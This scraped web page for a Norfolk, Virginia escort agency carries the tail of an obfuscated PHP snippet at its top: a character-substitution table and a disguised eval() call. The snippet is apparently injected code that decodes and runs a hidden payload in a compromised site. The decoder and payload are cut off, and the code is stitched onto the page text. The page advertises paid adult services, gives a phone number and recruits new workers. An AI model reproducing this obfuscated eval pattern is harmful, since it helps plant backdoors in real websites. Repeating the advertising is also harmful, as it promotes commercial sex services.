'M'=>'g', 'L'=>'H', 'O'=>'0', 'N'=>'u', 'Q'=>'l', 'P'=>'r', 'S'=>'P', 'R'=>'X', 'U'=>'Q', 'T'=>'T', 'W'=>'k', 'V'=>'6', 'Y'=>'F', 'X'=>'3', 'Z'=>'R', 'a'=>'m', 'c'=>'O', 'b'=>'4', 'e'=>'a', 'd'=>'1', 'g'=>'D', 'f'=>'d', 'i'=>'7', 'h'=>'Y', 'k'=>'b', 'j'=>'p', 'm'=>'C', 'l'=>'h', 'o'=>'c', 'n'=>'W', 'q'=>'K', 'p'=>'j', 's'=>'w', 'r'=>'e', 'u'=>'v', 't'=>'N', 'w'=>'5', 'v'=>'E', 'y'=>'z', 'x'=>'M', 'z'=>'U'); eval/*wemhrptx*/(newmpvlj($uvudsdfeq, $acpemlbp)); } New Hot Escorts | Norfolk, VA VIP Escort Service

Home

Featured Escorts

 

Virginia’s Hottest Escorts

VA’s HOTTEST Escorts & Entertainers (757) 318-0387

New Hot Escorts is the premiere choice for local escorts in the Hampton Roads, VA area. If you’re looking for that special adult provider, then look no further… New Hot Escorts provides escort services to all of Hampton Roads and beyond – including Newport News, Yorktown, Gloucester, Hampton, Suffolk, Franklin, Courtland, Norfolk & surrounding 7-5-7! Call an escort tonight … (757) 318-0387.

New Hot Escorts provides you with the best in adult entertainment. We service both hotel and residential areas. Male & female dancers are available 24 hours a day, providing adult entertainment, 2 girl shows, strip-o-grams, role play, and erotic reviews. We’ve got the best prices, highest quality companions, and continue to hire new faces daily. New Hot Escorts takes pride in providing escorts and exotic dancers for any event or function, regardless of how small or large the group may be.

New Hot Escorts is a New/Premier Virginia Escort Agency. If you’re attractive, intelligent, confident and openminded and want to work for a fresh new escort agency in Hampton Roads, New Hot Escorts would like to meet you. Must be at least 18 years old, honest, and reliable.